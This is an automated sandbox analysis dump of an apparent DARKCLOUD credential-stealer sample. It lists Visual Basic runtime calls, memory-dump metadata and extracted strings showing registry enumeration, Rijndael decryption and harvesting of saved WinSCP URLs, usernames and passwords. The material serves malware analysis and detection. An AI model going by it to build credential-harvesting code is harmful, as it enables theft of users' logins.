                                                          • __vbaFreeVar.MSVBVM60 ref: 00418C3D
                                                          • __vbaVarTstEq.MSVBVM60(00000001,?), ref: 00418C78
                                                          • __vbaStrCopy.MSVBVM60 ref: 00418C9C
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00418CB6
                                                          • __vbaStrCopy.MSVBVM60 ref: 00418CF3
                                                          • __vbaStrMove.MSVBVM60 ref: 00418D1B
                                                          • __vbaStrMove.MSVBVM60(?,?,?,00000001), ref: 00418D44
                                                          • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00418D4D
                                                          • __vbaChkstk.MSVBVM60(?,00000001), ref: 00418D68
                                                          • __vbaLateMemCallLd.MSVBVM60(00000008,?,test,00000001,?,00000001), ref: 00418DA7
                                                          • __vbaChkstk.MSVBVM60(00000000), ref: 00418DB6
                                                          • __vbaLateMemCallLd.MSVBVM60(0000000A,?,test,00000001,00000000), ref: 00418DF5
                                                          • __vbaVarOr.MSVBVM60(?,00000000), ref: 00418E06
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 00418E1B
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 00418E22
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 00418E54
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000008,0000000A), ref: 00418E6D
                                                          • __vbaChkstk.MSVBVM60(00000008), ref: 00418EE9
                                                          • __vbaVarIndexLoad.MSVBVM60(00000008,?,00000001,00000008), ref: 00418F23
                                                          • __vbaVarAdd.MSVBVM60(0000000A,00000000), ref: 00418F34
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00418F49
                                                          • __vbaVarAdd.MSVBVM60(?,?,00000000), ref: 00418F5E
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00418F73
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00418F7A
                                                          • __vbaStrMove.MSVBVM60 ref: 00418F87
                                                          • __vbaFreeVarList.MSVBVM60(00000005,00000008,0000000A,?,?,?), ref: 00418FB2
                                                          • __vbaStrCopy.MSVBVM60 ref: 00418FCD
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00418FE7
                                                          • __vbaStrCopy.MSVBVM60 ref: 00418FF8
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00419012
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419036
                                                          • __vbaStrMove.MSVBVM60 ref: 0041905E
                                                          • __vbaStrCopy.MSVBVM60(?,?), ref: 00419092
                                                          • __vbaStrMove.MSVBVM60 ref: 004190BA
                                                          • __vbaStrMove.MSVBVM60(00000000,00000000,?,00000001), ref: 004190E3
                                                          • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 004190EC
                                                          • __vbaChkstk.MSVBVM60(00000001,?,00000001), ref: 00419109
                                                          • __vbaVarIndexLoad.MSVBVM60(0000000A,?,00000001,00000001,?,00000001), ref: 00419143
                                                          • __vbaInStrVar.MSVBVM60(?,00000000,00000008,00000000), ref: 0041915D
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 00419172
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 00419179
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 004191C7
                                                          • __vbaFreeVarList.MSVBVM60(00000003,00000008,0000000A,?), ref: 004191E7
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419211
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041922B
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041923C
                                                          • __vbaStrMove.MSVBVM60 ref: 00419264
                                                          • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041928C
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00419293
                                                          • __vbaStrMove.MSVBVM60 ref: 004192A1
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004192AD
                                                          • __vbaStrMove.MSVBVM60 ref: 004192BB
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,00000000), ref: 004192C7
                                                          • __vbaStrMove.MSVBVM60 ref: 004192D5
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004192E1
                                                          • __vbaStrMove.MSVBVM60 ref: 004192EE
                                                          • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,00000000,00000000,00000000,?,00000000), ref: 0041932E
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419349
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00419363
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419374
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 0041938E
                                                          • __vbaStrCopy.MSVBVM60 ref: 004193B2
                                                          • __vbaStrMove.MSVBVM60 ref: 004193DA
                                                          • __vbaStrCopy.MSVBVM60(?,?), ref: 0041940E
                                                          • __vbaStrMove.MSVBVM60 ref: 00419436
                                                          • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,00000001), ref: 0041945F
                                                          • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00419468
                                                          • __vbaChkstk.MSVBVM60 ref: 00419483
                                                          • __vbaVarIndexLoad.MSVBVM60(0000000A,?,00000001), ref: 004194BD
                                                          • __vbaVarCmpEq.MSVBVM60(?,00008008,00000000), ref: 004194D5
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 004194EA
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 004194F1
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041953F
                                                          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,00008008), ref: 00419558
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 004195BA
                                                          • __vbaChkstk.MSVBVM60(00000008), ref: 004195F0
                                                          • __vbaVarIndexLoad.MSVBVM60(00008008,?,00000001,00000008), ref: 0041962A
                                                          • __vbaVarAdd.MSVBVM60(0000000A,00000000), ref: 0041963B
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00419650
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00419665
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 0041967A
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00419681
                                                          • __vbaStrMove.MSVBVM60 ref: 0041968E
                                                          • __vbaFreeVarList.MSVBVM60(00000006,00008008,0000000A,?,00000008,?,?), ref: 004196C0
                                                          • __vbaStrCopy.MSVBVM60 ref: 004196DB
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004196F5
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419706
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00419720
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419744
                                                          • __vbaStrMove.MSVBVM60 ref: 0041976C
                                                          • __vbaStrCopy.MSVBVM60(?,?), ref: 004197A0
                                                          • __vbaStrMove.MSVBVM60 ref: 004197C8
                                                          • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,00000001), ref: 004197F1
                                                          • __vbaInStr.MSVBVM60(00000000,00000000), ref: 004197FA
                                                          • __vbaChkstk.MSVBVM60 ref: 00419815
                                                          • __vbaVarIndexLoad.MSVBVM60(0000000A,?,00000001), ref: 0041984F
                                                          • __vbaVarCmpEq.MSVBVM60(?,00008008,00000000), ref: 00419867
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 0041987C
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 00419883
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 004198D1
                                                          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,00008008), ref: 004198EA
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 0041994C
                                                          • __vbaChkstk.MSVBVM60(00000008), ref: 00419982
                                                          • __vbaVarIndexLoad.MSVBVM60(00008008,?,00000001,00000008), ref: 004199BC
                                                          • __vbaVarAdd.MSVBVM60(0000000A,00000000), ref: 004199CD
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 004199E2
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 004199F7
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00419A0C
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00419A13
                                                          • __vbaStrMove.MSVBVM60 ref: 00419A20
                                                          • __vbaFreeVarList.MSVBVM60(00000006,00008008,0000000A,?,00000008,?,?), ref: 00419A52
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419A6D
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00419A87
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419A98
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00419AB2
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419AD6
                                                          • __vbaStrMove.MSVBVM60 ref: 00419AFE
                                                          • __vbaStrCopy.MSVBVM60(?,?), ref: 00419B32
                                                          • __vbaStrMove.MSVBVM60 ref: 00419B5A
                                                          • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,00000001), ref: 00419B83
                                                          • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00419B8C
                                                          • __vbaChkstk.MSVBVM60 ref: 00419BA7
                                                          • __vbaVarIndexLoad.MSVBVM60(0000000A,?,00000001), ref: 00419BE1
                                                          • __vbaVarCmpEq.MSVBVM60(?,00008008,00000000), ref: 00419BF9
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 00419C0E
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 00419C15
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 00419C63
                                                          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,00008008), ref: 00419C7C
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 00419CDE
                                                          • __vbaStrMove.MSVBVM60 ref: 00419CEC
                                                            • Part of subcall function 0042EA80: __vbaLenBstr.MSVBVM60(00000000,00402700,00000000,6D42D8B1), ref: 0042EAC9
                                                            • Part of subcall function 0042EA80: __vbaLenBstr.MSVBVM60 ref: 0042EAD7
                                                            • Part of subcall function 0042EA80: __vbaFpI4.MSVBVM60 ref: 0042EB11
                                                            • Part of subcall function 0042EA80: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 0042EB31
                                                            • Part of subcall function 0042EA80: __vbaUbound.MSVBVM60(00000001,?), ref: 0042EB40
                                                            • Part of subcall function 0042EA80: __vbaGenerateBoundsError.MSVBVM60 ref: 0042EB80
                                                            • Part of subcall function 0042EA80: #631.MSVBVM60(?,?,?,0040A4B0), ref: 0042EBB4
                                                            • Part of subcall function 0042EA80: __vbaStrMove.MSVBVM60 ref: 0042EBBF
                                                            • Part of subcall function 0042EA80: __vbaStrCat.MSVBVM60(00000000), ref: 0042EBC2
                                                            • Part of subcall function 0042EA80: __vbaStrMove.MSVBVM60 ref: 0042EBCD
                                                          • __vbaAryMove.MSVBVM60(?,?,?), ref: 00419D12
                                                            • Part of subcall function 0041B290: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0041B2AE
                                                            • Part of subcall function 0041B290: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 0041B2DE
                                                            • Part of subcall function 0041B290: #716.MSVBVM60(?,System.Security.Cryptography.RijndaelManaged,00000000,?,?,?,00000000,004030D6), ref: 0041B2FD
                                                            • Part of subcall function 0041B290: __vbaVarSetVar.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 0041B30B
                                                            • Part of subcall function 0041B290: __vbaChkstk.MSVBVM60 ref: 0041B32E
                                                            • Part of subcall function 0041B290: __vbaVarLateMemSt.MSVBVM60(?,keySize), ref: 0041B358
                                                            • Part of subcall function 0041B290: __vbaChkstk.MSVBVM60 ref: 0041B37B
                                                            • Part of subcall function 0041B290: __vbaVarLateMemSt.MSVBVM60(?,Padding), ref: 0041B3A5
                                                            • Part of subcall function 0041B290: __vbaChkstk.MSVBVM60 ref: 0041B3C8
                                                            • Part of subcall function 0041B290: __vbaVarLateMemSt.MSVBVM60(?,Mode), ref: 0041B3F2
                                                            • Part of subcall function 0041B290: __vbaStrCopy.MSVBVM60 ref: 0041B407
                                                            • Part of subcall function 0041B290: __vbaStrMove.MSVBVM60(?), ref: 0041B41B
                                                            • Part of subcall function 0041B290: __vbaStrCopy.MSVBVM60 ref: 0041B429
                                                          • __vbaChkstk.MSVBVM60(00000008,?), ref: 00419D54
                                                          • __vbaVarIndexLoad.MSVBVM60(00008008,?,00000001,00000008,?), ref: 00419D8E
                                                          • __vbaVarAdd.MSVBVM60(0000000A,00000000), ref: 00419D9F
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00419DB4
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00419DC9
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 00419DDE
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00419DE5
                                                          • __vbaStrMove.MSVBVM60 ref: 00419DF2
                                                          • __vbaFreeStr.MSVBVM60 ref: 00419DFE
                                                          • __vbaFreeVarList.MSVBVM60(00000006,00008008,0000000A,?,00000008,?,?), ref: 00419E30
                                                          • __vbaErase.MSVBVM60(00000000,?), ref: 00419E42
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419E5A
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00419E74
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419E85
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00419E9F
                                                          • __vbaStrCopy.MSVBVM60 ref: 00419EC3
                                                          • __vbaStrMove.MSVBVM60 ref: 00419EEB
                                                          • __vbaStrCopy.MSVBVM60(?,?), ref: 00419F1F
                                                          • __vbaStrMove.MSVBVM60 ref: 00419F47
                                                          • __vbaStrMove.MSVBVM60(00000000,00000000,?,00000001), ref: 00419F70
                                                          • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00419F79
                                                          • __vbaChkstk.MSVBVM60(?,00000001), ref: 00419F94
                                                          • __vbaVarIndexLoad.MSVBVM60(0000000A,?,00000001,?,00000001), ref: 00419FCE
                                                          • __vbaVarCmpEq.MSVBVM60(?,00008008,00000000), ref: 00419FE6
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 00419FFB
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041A002
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A050
                                                          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,00008008), ref: 0041A069
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041A093
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041A0AD
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 0041A0F6
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041A12B
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A153
                                                          • __vbaChkstk.MSVBVM60(00000008,?,?), ref: 0041A19C
                                                          • __vbaVarIndexLoad.MSVBVM60(00008008,?,00000001,00000008,?,?), ref: 0041A1D6
                                                          • __vbaVarAdd.MSVBVM60(0000000A,00000000), ref: 0041A1E7
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 0041A1FC
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 0041A211
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 0041A226
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 0041A23B
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,00000000), ref: 0041A250
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041A257
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A264
                                                          • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0041A288
                                                          • __vbaFreeVarList.MSVBVM60(00000009,00008008,0000000A,?,00000008,?,?,00000008,?,?), ref: 0041A2D2
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,00000000), ref: 0041A2ED
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A2FB
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041A307
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A314
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041A320
                                                          • __vbaInStr.MSVBVM60(00000000,WinSCP 2,00000000,00000001), ref: 0041A363
                                                          • __vbaChkstk.MSVBVM60 ref: 0041A37E
                                                          • __vbaVarIndexLoad.MSVBVM60(00008008,?,00000001), ref: 0041A3B8
                                                          • __vbaVarCmpEq.MSVBVM60(0000000A,00008008,00000000), ref: 0041A3D0
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 0041A3E5
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041A3EC
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041A3FF
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 0041A41E
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A42C
                                                          • __vbaInStr.MSVBVM60(00000000,WinSCP 2,?,00000001), ref: 0041A46F
                                                          • __vbaChkstk.MSVBVM60(?,00000001), ref: 0041A48A
                                                          • __vbaVarIndexLoad.MSVBVM60(00008008,?,00000001,?,00000001), ref: 0041A4C4
                                                          • __vbaVarCmpEq.MSVBVM60(0000000A,00008008,00000000), ref: 0041A4DC
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 0041A4F1
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041A4F8
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041A50B
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 0041A52A
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A535
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041A54D
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041A567
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041A58B
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A5B3
                                                          • __vbaInStr.MSVBVM60(00000000,WinSCP 2,?,00000001,?,?), ref: 0041A5EB
                                                          • __vbaChkstk.MSVBVM60(?,00000001,?,?), ref: 0041A606
                                                          • __vbaVarIndexLoad.MSVBVM60(0000000A,?,00000001,?,00000001,?,?), ref: 0041A640
                                                          • __vbaVarCmpEq.MSVBVM60(?,00008008,00000000), ref: 0041A658
                                                          • __vbaVarAnd.MSVBVM60(?,00000003,00000000), ref: 0041A66D
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041A674
                                                          • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0041A69F
                                                          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,00008008), ref: 0041A6B8
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 0041A6DE
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A6EC
                                                          • __vbaStrCat.MSVBVM60(Url: ,00000000), ref: 0041A705
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A713
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 0041A721
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A72F
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041A73B
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A748
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041A75E
                                                          • __vbaStrCat.MSVBVM60(Username: ,00000000), ref: 0041A779
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A787
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 0041A792
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A7A0
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041A7AC
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A7B9
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041A7CF
                                                          • __vbaStrCat.MSVBVM60(Password: ,00000000), ref: 0041A7EB
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A7F9
                                                            • Part of subcall function 0041B890: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0041B8AE
                                                            • Part of subcall function 0041B890: __vbaOnError.MSVBVM60(000000FF,004019D0,-00000001,6D4FEC2C,00000000,004030D6), ref: 0041B8DE
                                                            • Part of subcall function 0041B890: __vbaStrCat.MSVBVM60(00000000), ref: 0041B8FE
                                                            • Part of subcall function 0041B890: __vbaVarMove.MSVBVM60 ref: 0041B91D
                                                            • Part of subcall function 0041B890: __vbaLenBstr.MSVBVM60 ref: 0041B930
                                                            • Part of subcall function 0041B890: __vbaStrCat.MSVBVM60(0040796C,?), ref: 0041B9A0
                                                            • Part of subcall function 0041B890: __vbaStrMove.MSVBVM60 ref: 0041B9AE
                                                            • Part of subcall function 0041B890: #631.MSVBVM60(00000002,-00000001,00000002,00000000), ref: 0041B9CF
                                                            • Part of subcall function 0041B890: __vbaStrMove.MSVBVM60 ref: 0041B9DD
                                                            • Part of subcall function 0041B890: __vbaStrCat.MSVBVM60(00000000), ref: 0041B9E4
                                                            • Part of subcall function 0041B890: __vbaStrMove.MSVBVM60 ref: 0041B9F2
                                                            • Part of subcall function 0041B890: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BA08
                                                            • Part of subcall function 0041B890: __vbaFreeVar.MSVBVM60 ref: 0041BA17
                                                          • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 0041A81F
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041A826
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A834
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041A840
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A84D
                                                          • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041A86A
                                                          • __vbaStrCat.MSVBVM60(Application: WinSCP,00000000), ref: 0041A886
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A894
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041A8A0
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A8AD
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041A8B9
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,00000000), ref: 0041A8D1
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A8DF
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041A8EB
                                                          • __vbaStrMove.MSVBVM60 ref: 0041A8F8
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041A904
                                                          • __vbaStrCat.MSVBVM60(004055A8,?), ref: 0041A93E
                                                          • __vbaChkstk.MSVBVM60 ref: 0041A999
                                                          • __vbaVarCat.MSVBVM60(0000000A,?,00000008), ref: 0041A9D8
                                                          • __vbaChkstk.MSVBVM60 ref: 0041A9E5
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AA07
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AA36
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AA65
                                                          • __vbaLateMemCall.MSVBVM60(?,getstringvalue,00000005), ref: 0041AA9A
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000008,0000000A), ref: 0041AAB3
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0041AACC
                                                          • __vbaRedimPreserve.MSVBVM60(00000880,00000010,?,0000000C,00000001,00000000,00000000), ref: 0041AAF6
                                                          • __vbaStrCat.MSVBVM60(004055A8,?), ref: 0041AB0F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041AB69
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041AB86
                                                          • __vbaVarCat.MSVBVM60(0000000A,?,00000008), ref: 0041ABA7
                                                          • __vbaChkstk.MSVBVM60 ref: 0041ABB4
                                                          • __vbaVarLateMemSt.MSVBVM60(?,firebirdsncgfOSuUoKhMPcZZKaHeweYGxAwtGYYSacRrcPIcUQEflashers), ref: 0041ABE6
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000008,0000000A), ref: 0041ABFC
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041AC17
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041AC31
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041AC42
                                                          • __vbaStrMove.MSVBVM60 ref: 0041AC6A
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?), ref: 0041ACD7
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AD05
                                                          • __vbaVarLateMemSt.MSVBVM60(?,palmitoleicLIAHVjNxTeizPuQabacli), ref: 0041AD44
                                                          • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0041AD68
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041AD77
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041ADDC
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041ADF9
                                                          • __vbaVarCat.MSVBVM60(00000008,00000008,?), ref: 0041AE1A
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AE27
                                                          • __vbaVarLateMemSt.MSVBVM60(?,foambNcAqYCUqVnIeMZJldXgNbootjack), ref: 0041AE59
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041AE65
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AEC6
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AEF5
                                                          • __vbaChkstk.MSVBVM60 ref: 0041AF24
                                                          • __vbaLateMemCall.MSVBVM60(?,EnumKey,00000003), ref: 0041AF59
                                                          • #560.MSVBVM60(?), ref: 0041AF6D
                                                          • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?), ref: 0041AFAC
                                                          • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041AFDD
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041AFE9
                                                          • __vbaNextEachVar.MSVBVM60(?,?,?,?,?), ref: 0041B019
                                                          • __vbaAryUnlock.MSVBVM60(?,0041B26A), ref: 0041B113
                                                          • __vbaFreeObj.MSVBVM60 ref: 0041B11F
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B12B
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041B13A
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041B149
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041B158
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B161
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041B16A
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0041B283
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Copy$Free$List$Chkstk$Error$BoundsGenerate$Late$IndexLoad$BoolNull$Bstr$Call$Ubound$#631Redim$#716AddrefDestruct$#516#560EachNofreePreserveVarg$#537#598#608#626#632Construct2EraseNextOverflowUnlock
                                                          • String ID: 03092417503834140A4B0008180D$030F0E0C15$03200102292E1B3D521F2730067622332213$0401311D6B260E131F1633$0438083B3E05003027$072C0F25593D3A320A722F3B1D26$0A1E1F22742B07350508144E32391D$1023251F2F053E$1203273C3C123D1972050A1D1E1D0B$1222214566250B1339791C180F27$151C3D3373040C051C1F4B300A0319310022$183F2B3D61012B0610$1A25273F563C130B3B3606$1B26261A611804351E$1E322400241908017731200E023D24$1F17012475252A042E333A$2018204463330B0E3D$23213803311C3F39781F053938331C251E252B360D033A043318331D76232F1409263B390037052E37633830$246E0B064A1D2C7B135246573D0B791F6515647B196E3A1B6B2A264A3D5D7B703D37433E7909686214617A02274C00077D3D3A1C5F7A7C1F424A$251A13216305042F18$2600151E5A3A3A0B045124342510$2628097069392E26003D05$292D0B02$2A11$2B05173A$2B1A1D186E3C14292B3477160011301F3B1A$2F7C7A4948306C2575644C3A11463F25611E53417441302C7F19465B372254200C493B40467C3917254E160C413541797C452D3168257416054C0A2A683E113F51$302435041B0F220D33220A5B50282A162902373C$303C2B25$320A371833092330020F0334246A360C332B302A12270E18$323A320607240022233B36576315392428063E3F$3B0A1E26380C1C25$8V@$8V@$8V@$===============DARKCLOUD===============$Application: WinSCP$EnumKey$GetDWORDValue$GetExpandedStringValue$GetMultiStringValue$Global$HostName$HuMANzoInvqjU$IKtURdOrQrJTUtVlROvWiJksPlxjRXfYF$IgnoreCase$KpWpwCfxkOfEMPxJmczozsJFjHeXHZjBIcRmJFEeiq$KvWGqCPwJjbEahwFyEaHtclpMhLMZdkTc$MQrjmATXcbKBCpTnQeWeFoZmsCWHLbX$ONaNuyhIWxRaZpCuCIJJV$Password: 